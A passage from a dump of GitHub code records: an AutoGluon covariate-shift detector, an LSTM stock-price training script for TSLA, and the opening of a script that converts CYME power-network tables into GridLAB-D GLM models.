float = 0.01,\n eval_metric: str='balanced_accuracy',\n sample_label: str='i2vkyc0p64',\n classifier_kwargs: dict={}):\n named_metrics = BINARY_METRICS\n assert eval_metric in named_metrics.keys(), \\\n 'eval_metric must be one of [' + ', '.join(named_metrics.keys()) + ']'\n self.eval_metric = named_metrics[eval_metric]\n self.C2ST = Classifier2ST(classifier_class,\n sample_label=sample_label,\n eval_metric=self.eval_metric,\n compute_fi = compute_fi,\n classifier_kwargs=classifier_kwargs)\n if not label:\n warnings.warn('label is not specified, please ensure that train_data, test_data do not have the Y (label) '\n 'variable')\n self.label = label\n self._is_fit = False\n self.fi_scores = None\n self.compute_fi = compute_fi\n self.pvalue_thresh = pvalue_thresh\n\n @post_fit\n def _calculate_pvalue(self,\n num_permutations: int=1000) -> float:\n \"\"\"Compute the p-value which measures the significance level for the test statistic\n\n Parameters\n ----------\n num_permutations: int, default=1000\n The number of permutations used for any permutation based method\n\n Returns\n -------\n float of the p-value for the 2-sample test\n \"\"\"\n return self.C2ST.pvalue(num_permutations=num_permutations)\n\n\n def fit(self,\n X: pd.DataFrame,\n X_test: pd.DataFrame,\n pvalue_permutations: int=1000,\n **kwargs):\n \"\"\"Fit the XShift detector.\n\n Parameters\n ----------\n X : pd.DataFrame\n Training dataframe\n X_test : pd.DataFrame\n Test dataframe\n pvalue_permutations: int, default=1000\n The number of permutations used for pvalue calculation\n **kwargs (optional): keyword arguments to .fit() for the classifier_class\n \"\"\"\n assert self.C2ST.sample_label not in X.columns, \\\n f'your data columns contain {self.C2ST.sample_label} which is used internally'\n\n if self.label:\n if self.label in X.columns:\n X = X.drop(columns=[self.label])\n if self.label in X_test.columns:\n X_test = X_test.drop(columns=[self.label])\n\n self.C2ST.fit((X, X_test), **kwargs)\n\n # Feature importance\n if self.C2ST.has_fi and self.compute_fi:\n self.fi_scores = self.C2ST.feature_importance()\n\n self._is_fit = True\n self._X_test = X_test\n self.pvalue = self._calculate_pvalue(num_permutations=pvalue_permutations)\n\n @post_fit\n def decision(self) -> str:\n \"\"\"Decision function for testing XShift. Uncertainty quantification is currently not supported. Fit must be\n called prior to running.\n\n Returns\n -------\n One of ['detected', 'not detected']\n \"\"\"\n # default teststat_thresh by metric\n if self.p_value < self.pvalue_thresh:\n return 'detected'\n else:\n return 'not_detected'\n\n @post_fit\n def results(self) -> dict:\n \"\"\"Output the results of the C2ST in dictionary\n\n Returns\n -------\n dict of\n - `detection_status`: One of ['detected', 'not detected']\n - `test_statistic`: the C2ST statistic\n - 'pvalue': the p-value using permutation test\n - 'pvalue_threshold': the decision p-value threshold\n - `feature_importance`: the feature importance dataframe, if computed\n \"\"\"\n det_status = self.decision()\n res_json = {\n 'detection_status': det_status,\n 'test_statistic': self.C2ST.test_stat,\n 'pvalue': self.pvalue,\n 'pvalue_threshold': self.pvalue_thresh,\n 'eval_metric': self.eval_metric.name,\n }\n if self.fi_scores is not None:\n res_json['feature_importance'] = self.fi_scores\n return res_json\n\n\nclass XShiftDetector(AbstractAnalysis):\n \"\"\"Detect a change in covariate (X) distribution between training and test, which we call XShift. It can tell you\n if your training set is not representative of your test set distribution. This is done with a Classifier 2\n Sample Test.\n \"\"\"\n\n def __init__(self,\n classifier_class: Union[Any,None] = TabularPredictor,\n compute_fi: bool = True,\n classifier_kwargs: dict = {},\n parent: Union[None,AbstractAnalysis] = None,\n children: List[AbstractAnalysis] = [],\n **kwargs) -> None:\n super().__init__(parent, children, **kwargs)\n self.classifier_kwargs = classifier_kwargs\n self.classifier_class = classifier_class\n self.compute_fi = compute_fi\n\n def _fit(self, state: AnalysisState, args: AnalysisState, **fit_kwargs):\n # where to put path?\n # how to sample?\n if 'label' in args:\n label = args['label']\n else:\n label = None\n tst = C2STShiftDetector(classifier_class=self.classifier_class,\n label=label,\n compute_fi=self.compute_fi,\n classifier_kwargs=self.classifier_kwargs)\n assert 'train_data' in args, 'train_data required as arg'\n assert 'test_data' in args, 'test_data required as arg'\n tst.fit(X=args['train_data'],\n X_test=args['test_data'],\n verbosity=0)\n state.xshift_results = tst.results()\n pass\n","repo_name":"jsharpna/autogluon_eda","sub_path":"eda/src/autogluon/eda/analysis/shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":13798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"70813766606","text":"# Train a model for each symbol by using best features and best offset.\n# For each symbol we want to predict the close value after 5,10,15,20 days\n\n# Import libraries\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport pickle\n\n# Select symbol to predict\nsymbol = 'TSLA_close'\nmax_features_number = 60 # limit the max number of features to use, we can download a limited amount of\n# data because of API boundary\ntrain_split = 0.8\ndays_to_predict = [20]\nwindow_size = 3\nmaximum_mae_admitted = 48\npatience = 300 # patience of the Early Stopping Checkout\n\n# Load best features and best offset list\nwith open('features_selector_data/features_selector.p', 'rb') as fp:\n selected_features = pickle.load(fp)\n\nfeatures = selected_features[symbol]['features']\noffset = selected_features[symbol]['offset']\n\n# Load data\nfull_data = pd.read_csv('clean_data/full_data.csv', index_col=False)\n\n# I needed, select only the first max_features_number features that are the most correlated ones\nif len(selected_features[symbol]['features']) > max_features_number:\n features = selected_features[symbol]['features'][:max_features_number]\n offsets = selected_features[symbol]['offset'][:max_features_number]\nelse:\n features = selected_features[symbol]['features']\n offsets = selected_features[symbol]['offset']\n\n# Create matrices for x and y where y[time] and x[time,feature]\ny = np.flip(np.array(full_data[symbol])) # y[time]\nx = np.array(full_data[features])\nfor i in range(x.shape[1]): # x[time,feature]\n x[:, i] = np.flip(x[:, i])\n\n# Apply offset to each features in x and reshape matrix\nseries_length = [(x.shape[0] - offsets[i] - sum(np.isnan(x[i])))\n for i in range(len(features))\n ]\nx_length = min(series_length)\noffset_y = y[-x_length:]\noffset_x = np.empty((x_length, len(features)))\n\nfor i in range(len(features)):\n offset_x[:, i] = x[:, i][-offsets[i] - x_length: -offsets[i]]\n\nmax_predicted_period = max(days_to_predict)\nwindow_x = [None] * (x_length - window_size)\nwindow_y = [None] * (x_length - window_size)\n\nfor i in range(x_length - window_size):\n current_window_x = offset_x[i + 1:i + window_size + 1, :]\n current_window_y = offset_y[i + window_size - max_predicted_period + np.array(days_to_predict)]\n window_x[i] = current_window_x\n window_y[i] = current_window_y\n\nwindow_x = np.array(window_x)\nwindow_y = np.array(window_y)\n\n# Training-Validation split: we use the oldest values for training and the newest values for validation\nindex_split = int(train_split * window_x.shape[0])\nx_train = window_x[:index_split, :, :]\nx_valid = window_x[index_split:, :, :]\ny_train = window_y[:index_split, :]\ny_valid = window_y[index_split:, :]\n\n# Model training\noptimizer = tf.keras.optimizers.Adam(lr=1e-5)\ncheckpoint_cb = tf.keras.callbacks.ModelCheckpoint('models/' + symbol + '.h5', save_best_only=True)\nearly_stopping_cb = tf.keras.callbacks.EarlyStopping(patience=300, restore_best_weights=True)\n\n# since model performances are very linked to selection of initial values, the model is trained\n# until its validation loss is sufficiently low\ngo_on = True\n\nwhile go_on:\n model = tf.keras.models.Sequential([\n tf.keras.layers.Conv1D(filters=32, kernel_size=5,\n strides=1, padding=\"causal\",\n activation=\"relu\",\n input_shape=[window_size, len(features)]),\n tf.keras.layers.LSTM(64, return_sequences=True),\n tf.keras.layers.LSTM(64),\n tf.keras.layers.Dense(64, activation=\"relu\"),\n tf.keras.layers.Dropout(0.1),\n tf.keras.layers.Dense(10, activation=\"relu\"),\n tf.keras.layers.Dense(len(days_to_predict)),\n tf.keras.layers.Lambda(lambda x: x * 600) # speed up the convergence to optimum\n ])\n\n model.compile(loss=tf.keras.losses.Huber(),\n optimizer=optimizer,\n metrics=[\"mae\"])\n\n history = model.fit(\n x_train, y_train,\n validation_data=(x_valid, y_valid),\n epochs=5000,\n callbacks=[checkpoint_cb, early_stopping_cb]\n )\n\n if history.history['val_mae'][-patience] < maximum_mae_admitted: # [-patience] is the index of the minimum loss\n go_on = False\n\n\n# Plot training and validation loss\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(len(loss)) # get number of epochs\n\nplt.plot(epochs, loss, 'r', label='Training Loss')\nplt.plot(epochs, val_loss, 'b', label='Validation Loss')\nplt.vlines(x=len(loss) - 300, ymin=0, ymax=600, # add early stopping vertical line\n colors='green', ls=':', lw=2,\n label='Early stopping')\nplt.title('Training and Validation Loss')\nplt.xlabel(\"Epochs\")\nplt.ylabel(\"Loss\")\n\nplt.legend()\nplt.figure()\n\n# Save model info\nmodel_info = {\n 'loss': history.history['loss'],\n 'val_loss': history.history['val_loss'],\n 'predicted_days': days_to_predict,\n 'window_size': window_size,\n 'max_features_number': max_features_number\n}\n\nwith open('models/' + symbol + '_info.p', 'wb') as fp:\n pickle.dump(model_info, fp)\n","repo_name":"danieled3/Autotrading","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"35111544089","text":"#!/usr/bin/python3\n\"\"\"OpenFIDO write_glm post-processor script\n\nSyntax:\n\thost% python3 -m write_glm.py -i|--input INPUTDIR -o|--output OUTPUTDIR -d|--data DATADIR [-c|--config [CONFIGCSV]] [-h|--help] [-t|--cyme-tables]\n\nConcept of Operation\n--------------------\n\nFiles are processed in the local folder, which must contain the required CSV files list in the `cyme_tables_required` \nglobal variable. \n\nOperation of this script is controlled by the file `{INPUTDIR}/config.csv`:\n\n\tTABLES,glm\n\tEXTRACT,non-empty\n\tPOSTPROC,write_glm.py\n\tGLM_NOMINAL_VOLTAGE,2.40178 kV\n\tGLM_NETWORK_PREFIX,IEEE13_\n\tGLM_INCLUDE,config.glm\n\tGLM_MODIFY,modify.csv\n\tGLM_DEFINE,SOLUTIONDUMP=yes\n\tGLM_ASSUMPTIONS,include\n\nAll output is written to the parent folder. Currently the following files are generated, depending on the\nsettings in control file:\n\n - `{OUTPUTDIR}/{MDBNAME}_{NETWORKID}.glm`\n - `{OUTPUTDIR}/{MDBNAME}_{NETWORKID}_assumptions.glm`\n - `{OUTPUTDIR}/{MDBNAME}_{NETWORKID}_assumptions.glm`\n - `{OUTPUTDIR}/{MDBNAME}_{NETWORKID}_assumptions.csv`\n\n\"\"\"\n\napp_version = 0\n\nimport sys, os\nimport getopt\nimport subprocess\nimport glob\nimport datetime as dt\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom math import sqrt\nimport re\nimport hashlib\nimport csv\nimport pprint\npp = pprint.PrettyPrinter(indent=4,compact=True)\nimport traceback\nfrom copy import copy\n\n#\n# Required tables to operate properly\n#\ncyme_tables_required = [\n\t\"CYMNETWORK\",\"CYMHEADNODE\",\"CYMNODE\",\"CYMSECTION\",\"CYMSECTIONDEVICE\",\n\t\"CYMOVERHEADBYPHASE\",\"CYMOVERHEADLINEUNBALANCED\",\"CYMEQCONDUCTOR\",\n\t\"CYMEQGEOMETRICALARRANGEMENT\",\"CYMEQOVERHEADLINEUNBALANCED\",\n\t\"CYMSWITCH\",\"CYMCUSTOMERLOAD\",\"CYMSHUNTCAPACITOR\",\n\t\"CYMTRANSFORMER\",\"CYMEQTRANSFORMER\",\"CYMREGULATOR\",\"CYMEQREGULATOR\"\n\t]\n\n#\n# Argument parsing\n#\nconfig = {\n\t\"input\" : \"/\",\n\t\"output\" : \"/\",\n\t\"from\" : {},\n\t\"type\" : {},\n\t\"options\" : {\n\t\t\"config\" : \"specify config.csv\",\n\t\t\"cyme-tables\" : \"get required CYME tables\",\n\t},\n}\ninput_folder = None\noutput_folder = None\ndata_folder = None\nconfig_file = None\nopts, args = getopt.getopt(sys.argv[1:],\"hc:i:o:d:t\",[\"help\",\"config=\",\"input=\",\"output=\",\"data=\",\"cyme-tables\"])\n\ndef help(exit_code=None,details=False):\n\tprint(\"Syntax: python3 -m write_glm.py -i|--input DIR -o|--output DIR -d|--data DIR [-h|--help] [-t|--cyme-tables] [-c|--config CSV]\")\n\tif details:\n\t\tprint(globals()[__name__].__doc__)\n\tif type(exit_code) is int:\n\t\texit(exit_code)\n\nif not opts : \n\thelp(1)\n\nfor opt, arg in opts:\n\tif opt in (\"-h\",\"--help\"):\n\t\thelp(0,details=True)\n\telif opt in (\"-c\",\"--config\"):\n\t\tif arg:\n\t\t\tconfig_file = arg.strip()\n\t\telse:\n\t\t\tprint(config)\n\telif opt in (\"-t\",\"--cyme-tables\"):\n\t\tprint(\" \".join(cyme_tables_required))\n\t\tsys.exit(0)\n\telif opt in (\"-i\", \"--input\"):\n\t\tinput_folder = arg.strip()\n\telif opt in (\"-o\", \"--output\"):\n\t\toutput_folder = arg.strip()\n\telif opt in (\"-d\", \"--data\"):\n\t\tdata_folder = arg.strip()\n\telse:\n\t\terror(f\"{opt}={arg} is not a valid option\");\nif input_folder == None:\n\traise Exception(\"input_folder must be specified using '-i|--input DIR' option\")\nif output_folder == None:\n\traise Exception(\"output_folder must be specified using '-o|--OUTPUT DIR' option\")\nif data_folder == None:\n\traise Exception(\"data_folder must be specified using '-d|--data DIR' option\")\nif config_file == None:\n\tconfig_file = f\"{input_folder}/config.csv\"\n\n#\n# Application information\n#\napp_command = os.path.abspath(sys.argv[0])\napp_workdir = os.getenv(\"PWD\")\napp_path = \"/\"+\"/\".join(app_command.split(\"/\")[0:-1])\n\n#\n# Git information\n#\n# TODO: change this to use gitpython module\n#\ndef command(cmd,lang=\"utf-8\"):\n\treturn subprocess.run(cmd.split(),stdout=subprocess.PIPE).stdout.decode(lang).strip()\nos.chdir(app_path)\ngit_project = command(\"git config --local remote.origin.url\")\ngit_commit = command(\"git rev-parse HEAD\")\ngit_branch = command(\"git rev-parse --abbrev-ref HEAD\")\nos.chdir(app_workdir)\n\n#\n# CYME model information\n#\ncyme_mdbname = data_folder.split(\"/\")[-1]\ndefault_cyme_extractor = \"50\"\n\n#\n# Warning/error handling\n#\nwarning_count = 0\ndef warning(*args):\n\tglobal warning_count\n\twarning_count += 1\n\tif settings[\"GLM_WARNINGS\"] == \"stdout\":\n\t\tprint(f\"*** WARNING {warning_count} ***\")\n\t\tprint(\" \",\"\\n \".join(args))\n\telif settings[\"GLM_WARNINGS\"] == \"stderr\":\n\t\tprint(f\"*** WARNING {warning_count} ***\",file=sys.stderr)\n\t\tprint(\" \",\"\\n \".join(args),file=sys.stderr)\n\telse:\n\t\traise Exception(\"\\n\".join(args))\n\nerror_count = 0\ndef error(*args):\n\tglobal error_count\n\terror_count += 1\n\tif settings[\"GLM_ERRORS\"] == \"stdout\":\n\t\tprint(f\"*** ERROR {error_count} ***\")\n\t\tprint(\" \",\"\\n \".join(args))\n\telif settings[\"GLM_ERRORS\"] == \"stderr\":\n\t\tprint(f\"*** ERROR {error_count} ***\",file=sys.stderr)\n\t\tprint(\" \",\"\\n \".join(args),file=sys.stderr)\n\telse:\n\t\traise Exception(\"\\n\".join(args))\n\ndef format_exception(errmsg,ref=None,data=None):\n\ttb = str(traceback.format_exc().replace('\\n','\\n '))\n\tdd = str(pp.pformat(data).replace('\\n','\\n '))\n\treturn \"\\n \" + tb + \"'\" + ref + \"' =\\n \"+ dd\n\n#\n# Load user configuration\n#\nconfig = pd.DataFrame({\n\t\"GLM_NETWORK_PREFIX\" : [\"\"],\n\t\"GLM_NETWORK_MATCHES\" : [\".*\"],\n\t\"GLM_NOMINAL_VOLTAGE\" : [\"\"],\n\t\"GLM_INCLUDE\" : [\"\"],\n\t\"GLM_DEFINE\" : [\"\"],\n\t\"GLM_ERRORS\" : [\"exception\"],\n\t\"GLM_WARNINGS\" : [\"stdout\"],\n\t\"GLM_MODIFY\" : [\"\"],\n\t\"GLM_ASSUMPTIONS\" : [\"include\"]\n\t}).transpose().set_axis([\"value\"],axis=1,inplace=0)\nconfig.index.name = \"name\" \nsettings = pd.read_csv(config_file, dtype=str,\n\tnames=[\"name\",\"value\"],\n\tcomment = \"#\",\n\t).set_index(\"name\")\nfor name, values in settings.iterrows():\n\tif name in config.index:\n\t\tconfig[\"value\"][name] = values[0]\nsettings = config[\"value\"]\nprint(f\"Running write_glm.py:\")\nfor name, data in config.iterrows():\n\tprint(f\" {name} = {data['value']}\")\n\n#\n# Phase mapping\n#\ncyme_phase_name = {0:\"ABCN\", 1:\"A\", 2:\"B\", 3:\"C\", 4:\"AB\", 5:\"AC\", 6:\"BC\", 7:\"ABC\"} # CYME phase number -> phase names\nglm_phase_code = {\"A\":1, \"B\":2, \"C\":4, \"AB\":3, \"AC\":5, \"BC\":6, \"ABC\":7} # GLM phase name -> phase number\nglm_phase_name = {0:\"ABCN\", 1:\"A\",2:\"B\",3:\"AB\",4:\"C\",5:\"AC\",6:\"BC\",7:\"ABC\"} # GLM phase number -> phase name\n\n#\n# Device type mapping\n#\ncyme_devices = {\n\t1 : \"UndergroundLine\",\n\t2 : \"OverheadLine\",\n\t3 : \"OverheadByPhase\",\n\t4 : \"Regulator\",\n\t5 : \"Transformer\",\n\t6 : \"Not used\",\n\t7 : \"Not used\",\n\t8 : \"Breaker\",\n\t9 : \"LVCB\",\n\t10 : \"Recloser\",\n\t11 : \"Not used\",\n\t12 : \"Sectionalizer\",\n\t13 : \"Switch\",\n\t14 : \"Fuse\",\n\t15 : \"SeriesCapacitor\",\n\t16 : \"SeriesReactor\",\n\t17 : \"ShuntCapacitor\",\n\t18 : \"ShuntReactor\",\n\t19 : \"Not used\",\n\t20 : \"SpotLoad\",\n\t21 : \"DistributedLoad\",\n\t22 : \"Miscellaneous\",\n\t23 : \"OverheadLineUnbalanced\",\n\t24 : \"ArcFurnace\",\n\t25 : \"CTypeFilter\",\n\t26 : \"DoubleTunedFilter\",\n\t27 : \"HighPassFilter\",\n\t28 : \"IdealConverter\",\n\t29 : \"NonIdealConverter\",\n\t30 : \"ShuntFrequencySource\",\n\t31 : \"Not used\",\n\t32 : \"SingleTunedFilter\",\n\t33 : \"InductionMotor\",\n\t34 : \"SynchronousMotor\",\n\t35 : \"InductionGenerator\",\n\t36 : \"SynchronousGenerator\",\n\t37 : \"ElectronicConverterGenerator\",\n\t38 : \"TransformerByPhase\",\n\t39 : \"ThreeWindingTransformer\",\n\t40 : \"NetworkEquivalent\",\n\t41 : \"Wecs\",\n\t42 : \"GroundingTransformer\",\n\t43 : \"MicroTurbine\",\n\t44 : \"Sofc\",\n\t45 : \"Photovoltaic\",\n\t46 : \"SeriesFrequencySource\",\n\t47 : \"AutoTransformer\",\n\t48 : \"ThreeWindingAutoTransformer\",\n}\nglm_devices = {\n\t1 : \"underground_line\",\n\t2 : \"overhead_line\",\n\t3 : \"overhead_line\",\n\t4 : \"regulator\",\n\t5 : \"transformer\",\n\t# 8 : \"breaker\",\n\t# 10 : \"recloser\",\n\t# 12 : \"sectionalizer\",\n\t13 : \"switch\",\n\t# 14 : \"fuse\",\n\t17 : \"capacitor\",\n\t20 : \"load\",\n\t21 : \"load\",\n\t23 : \"overhead_line\",\n}\n\n#\n# CYME database access tools\n#\n\n# find records in a table (exact field match only)\ndef table_find(table,**kwargs):\n\tresult = table\n\tfor key,value in kwargs.items():\n\t\tresult = result[result[key]==value]\n\treturn result\n\n# get the value in a table using the index\ndef table_get(table,id,column=None):\n\tif column == None or column == \"*\":\n\t\treturn table.loc[id]\n\telse:\n\t\treturn table.loc[id][column]\n\n#\n# Load all the model tables (table names have an \"s\" appended)\n#\ncyme_table = {}\nfor filename in glob.iglob(f\"{data_folder}/*.csv\"):\n\tdata = pd.read_csv(filename, dtype=str)\n\tindex = data.columns[0]\n\tname = os.path.basename(filename)[0:-4].lower()\n\tcyme_table[name] = data.set_index(index)\nfor filename in cyme_tables_required:\n\tif filename[3:].lower() not in cyme_table.keys():\n\t\traise Exception(f\"required CYME table '{filename}' is not found in {input_folder}\")\n\n#\n# GLM file builder\n#\nclass GLM:\n\n\tprefix = {\n\t\t# known powerflow class in gridlabd\n\t\t\"billdump\" : \"BD_\",\n\t\t\"capacitor\" : \"CA_\",\n\t\t\"currdump\" : \"CD_\",\n\t\t\"emissions\" : \"EM_\",\n\t\t\"fault_check\" : \"FC_\",\n\t\t\"frequency_gen\" : \"FG_\",\n\t\t\"fuse\" : \"FS_\",\n\t\t\"impedance_dump\" : \"ID_\",\n\t\t\"line\" : \"LN_\",\n\t\t\"line_configuration\" : \"LC_\",\n\t\t\"line_sensor\" : \"LS_\",\n\t\t\"line_spacing\" : \"LG_\",\n\t\t\"link\" : \"LK_\",\n\t\t\"load\" : \"LD_\",\n\t\t\"load_tracker\" : \"LT_\",\n\t\t\"meter\" : \"ME_\",\n\t\t\"motor\" : \"MO_\",\n\t\t\"node\" : \"ND_\",\n\t\t\"overhead_line\" : \"OL\",\n\t\t\"overhead_line_conductor\" : \"OC_\",\n\t\t\"pole\" : \"PO_\",\n\t\t\"pole_configuration\" : \"PC_\",\n\t\t\"power_metrics\" : \"PM_\",\n\t\t\"powerflow_library\" : \"PL_\",\n\t\t\"powerflow_object\" : \"PO_\",\n\t\t\"pqload\" : \"PQ_\",\n\t\t\"recloser\" : \"RE_\",\n\t\t\"regulator\" : \"RG_\",\n\t\t\"regulator_configuration\" : \"RC_\",\n\t\t\"restoration\" : \"RS_\",\n\t\t\"sectionalizer\" : \"SE_\",\n\t\t\"series_reactor\" : \"SR_\",\n\t\t\"substation\" : \"SS_\",\n\t\t\"switch\" : \"SW_\",\n\t\t\"switch_coordinator\" : \"SC_\",\n\t\t\"transformer\" : \"TF_\",\n\t\t\"transformer_configuration\" : \"TC_\",\n\t\t\"triplex_line\" : \"XL_\",\n\t\t\"triplex_line_conductor\" : \"XC_\",\n\t\t\"triplex_line_configuration\" : \"XG_\",\n\t\t\"triplex_load\" : \"XD_\",\n\t\t\"triplex_meter\" : \"XM_\",\n\t\t\"triplex_node\" : \"XN_\",\n\t\t\"underground_line\" : \"UL_\",\n\t\t\"underground_line_conductor\" : \"UC_\",\n\t\t\"vfd\" : \"VF_\",\n\t\t\"volt_var_control\" : \"VV_\",\n\t\t\"voltdump\" : \"VD_\",\n\t}\n\n\tdef __init__(self,file,mode=\"w\"):\n\n\t\tself.filename = file\n\t\tself.fh = open(file,mode)\n\t\tself.objects = {}\n\t\tself.assumptions = []\n\t\tself.refcount = {}\n\n\tdef __del__(self):\n\t\tif self.objects:\n\t\t\tself.error(\"glm object was deleted before objects were output\")\n\n\tdef name(self,name,oclass=None):\n\t\tif type(name) is list: # composite name\n\t\t\tname = \"_\".join(name).replace(\".\",\"\").replace(\":\",\"\")[0:63] # disallow special name characters\n\t\tif oclass: # name prefix based on class\n\t\t\tif not oclass in self.prefix.keys(): # name prefix not found\n\t\t\t\tprefix = f\"Z{len(self.prefix.keys())}_\"\n\t\t\t\tself.prefix[oclass] = prefix\n\t\t\t\twarning(f\"{cyme_mdbname}@{network_id}: class '{oclass}' is not a known gridlabd powerflow class, using prefix '{prefix}' for names\")\n\t\t\telse:\n\t\t\t\tprefix = self.prefix[oclass]\n\t\t\tname = prefix + name\n\t\telif \"0\" <= name[0] <= \"9\": # fix names that start with digits\n\t\t\tname = \"_\" + name\n\t\treturn name.replace(\" \",\"_\") # remove white spaces from names\n\n\tdef write(self,line):\n\t\tprint(line,file=self.fh)\n\n\tdef blank(self):\n\t\tself.write(\"\")\n\n\tdef print(self,message):\n\t\tself.write(f\"#print {message}\")\n\n\tdef warning(self,message):\n\t\tself.write(f\"#warning {message}\")\n\n\tdef error(self,message):\n\t\tself.write(f\"#error {message}\")\n\n\tdef comment(self,*lines):\n\t\tfor line in lines:\n\t\t\tself.write(f\"// {line}\")\n\n\tdef set(self,name,value):\n\t\tself.write(f\"#set {name}={value}\")\n\n\tdef define(self,name,value):\n\t\tself.write(f\"#define {name}={value}\")\n\n\tdef include(self,name,brackets=\"\\\"\\\"\"):\n\t\tself.write(f\"#include {brackets[0]}{name}{brackets[1]}\")\n\n\tdef module(self, name, parameters = {}):\n\t\tif not parameters:\n\t\t\tself.write(f\"module {name};\")\n\t\telse:\n\t\t\tself.write(f\"module {name}\")\n\t\t\tself.write(\"{\")\n\t\t\tfor tag, value in parameters.items():\n\t\t\t\t\tif type(value) is str:\n\t\t\t\t\t\tself.write(f\"\\t{tag} \\\"{value}\\\";\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.write(f\"\\t{tag} {value};\")\n\t\t\tself.write(\"}\")\n\n\tdef ifdef(self, name, call):\n\t\tglm.write(f\"#ifdef {name}\")\n\t\tcall()\n\t\tglm.write(\"#endif\")\n\n\tdef ifndef(self, name, call):\n\t\tglm.write(f\"#ifndef {name}\")\n\t\tcall()\n\t\tglm.write(\"#endif\")\n\n\tdef ifexist(self, name, call):\n\t\tglm.write(f\"#ifexist {name}\")\n\t\tcall()\n\t\tglm.write(\"#endif\")\n\n\tdef object(self, oclass, name, parameters,overwrite=True):\n\t\tif name not in self.objects.keys():\n\t\t\tobj = {\"name\" : name}\n\t\t\tself.objects[name] = obj\n\t\telse:\n\t\t\tobj = self.objects[name]\n\t\tfor key, value in parameters.items():\n\t\t\tif not overwrite and key in obj.keys() and obj[key] != value:\n\t\t\t\traise Exception(f\"object property '{key}={obj[key]}' merge conflicts with '{key}={value}'\")\n\t\t\tif value == None and key in obj.keys():\n\t\t\t\tdel obj[key]\n\t\t\telse:\n\t\t\t\tobj[key] = value\n\t\tobj[\"class\"] = oclass\n\t\tif name in self.refcount.keys():\n\t\t\tself.refcount[name] += 1\n\t\telse:\n\t\t\tself.refcount[name] = 1\n\t\treturn obj\n\n\tdef delete(self,name):\n\t\tif self.refcount[name] == 1:\n\t\t\tdel self.objects[name]\n\t\telif self.refcount[name] > 1:\n\t\t\tself.refcount[name] -= 1\n\n\n\tdef modify(self,object,property,value,comment=\"\"):\n\t\tif comment:\n\t\t\tcomment = \" // \" + str(comment)\n\t\telif not type(comment) is str:\n\t\t\tcomment = \"\"\n\t\tif type(value) is str:\n\t\t\tself.write(f\"modify {object}.{property} \\\"{value}\\\";{comment}\")\n\t\telse:\n\t\t\tself.write(f\"modify {object}.{property} {value};{comment}\")\n\n\tdef assume(self,objname,propname,value,remark=\"\"):\n\t\tself.assumptions.append([objname,propname,value,remark])\n\n\tdef close(self):\n\t\t\n\t\t# objects\n\t\tif self.objects:\n\t\t\tfor name, parameters in self.objects.items():\n\t\t\t\tself.write(f\"object {parameters['class']}\")\n\t\t\t\tself.write(\"{\")\n\t\t\t\tfor tag, value in parameters.items():\n\t\t\t\t\tif tag != \"class\":\n\t\t\t\t\t\tif type(value) is str:\n\t\t\t\t\t\t\tself.write(f\"\\t{tag} \\\"{value}\\\";\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.write(f\"\\t{tag} {value};\")\n\t\t\t\tself.write(\"}\")\n\t\t\tself.objects = {}\n\n\t\t# assumptions\n\t\tif self.assumptions:\n\t\t\tif settings[\"GLM_ASSUMPTIONS\"] == \"save\":\n\t\t\t\tfilename = f\"{settings['GLM_NETWORK_PREFIX']}{cyme_mdbname}_{network_id}_assumptions.glm\"\n\t\t\t\twith open(f\"{output_folder}/{filename}\",\"w\") as fh:\n\t\t\t\t\tprint(\"// Assumptions for GLM conversion from database {cyme_mdbname} network {network_id}\",file=fh)\n\t\t\t\t\tfor row in self.assumptions:\n\t\t\t\t\t\tprint(f\"modify {row[0]}.{row[1]} \\\"{row[2]}\\\"; // {row[3]}\",file=fh)\n\t\t\telif settings[\"GLM_ASSUMPTIONS\"] == \"include\":\n\t\t\t\tself.blank()\n\t\t\t\tself.comment(\"\",\"Assumptions\",\"\")\n\t\t\t\tfor row in self.assumptions:\n\t\t\t\t\tself.modify(row[0],row[1],row[2],row[3])\n\t\t\telif settings[\"GLM_ASSUMPTIONS\"] == \"warn\":\n\t\t\t\tfilename = f\"{output_folder}/{cyme_mdbname}_{network_id}_assumptions.csv\"\n\t\t\t\twarning(f\"{cyme_mdbname}@{network_id}: {len(self.assumptions)} assumptions made, see '{filename}' for details\")\n\t\t\t\tpd.DataFrame(self.assumptions).to_csv(filename,header=[\"object_name\",\"property_name\",\"value\",\"remark\"],index=False)\n\t\t\telif settings[\"GLM_ASSUMPTIONS\"] != \"ignore\":\n\t\t\t\twarning(f\"GLM_ASSUMPTIONS={settings['GLM_ASSUMPTIONS']} is not valid (must be one of 'save','ignore','warn','include')\")\n\t\t\n\t\t# modifications\n\t\tfor modify in settings[\"GLM_MODIFY\"].split():\n\t\t\tself.blank()\n\t\t\tself.comment(\"\",f\"Modifications from '{modify}'\",\"\")\n\t\t\twith open(f\"{input_folder}/{modify}\",\"r\") as fh:\n\t\t\t\treader = csv.reader(fh)\n\t\t\t\tfor row in reader:\n\t\t\t\t\tif 0 < len(row) < 3:\n\t\t\t\t\t\twarning(f\"{modify}: row '{','.join(list(row))}' is missing one or more required fields\")\n\t\t\t\t\telif len(row) > 3:\n\t\t\t\t\t\twarning(f\"{modify}: row '{','.join(list(row))}' has extra fields that will be ignored\")\n\t\t\t\t\t\tself.modify(*row[0:3])\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.modify(*row)\n\n\t# general glm model add function\n\tdef add(self,oclass,device_id,data,version,**kwargs):\n\t\ttry:\n\t\t\tcall = getattr(self,\"add_\"+oclass)\n\t\t\treturn call(device_id,data,version=version,**kwargs)\n\t\texcept Exception as errmsg:\n\t\t\twarning(f\"{cyme_mdbname}@{network_id}: unable to add gridlabd class '{oclass}' using CYME device '{device_id}': {errmsg} {format_exception(errmsg,device_id,data.to_dict())}\")\n\t\t\tpass \t\n\n\t# add a link to glm file\n\tdef add_link(self,section_id,section,version,**kwargs):\n\t\tphase = int(section[\"Phase\"])\n\t\tfrom_node_id = section[\"FromNodeId\"]\n\t\tto_node_id = section[\"ToNodeId\"]\n\t\tdevice_dict = 